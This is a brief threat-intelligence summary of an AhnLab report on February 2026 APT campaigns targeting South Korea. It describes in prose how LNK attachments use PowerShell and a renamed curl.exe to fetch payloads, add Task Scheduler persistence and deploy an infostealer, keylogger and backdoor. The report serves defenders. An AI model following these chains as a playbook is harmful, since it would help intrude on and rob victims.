AhnLab observed February 2026 APT activity targeting South Korea, with spear phishing as the dominant delivery method and LNK files the most common attachment type. One LNK chain contacted an external URL through PowerShell, copied curl.exe under another filename, downloaded AutoIt components, and registered a malicious AutoIt script in Task Scheduler for persistence. A second LNK chain used the built-in curl.exe to retrieve a malicious HTA from attacker-controlled GitHub or Google Drive infrastructure, then deployed sys.dll, an infostealer, a keylogger, and a memory-loaded backdoor. The malware collected system information, important file lists, virtual-asset-related data, and supported attacker command execution, with the source providing filenames, MD5 hashes, URLs, and IP addresses for detection.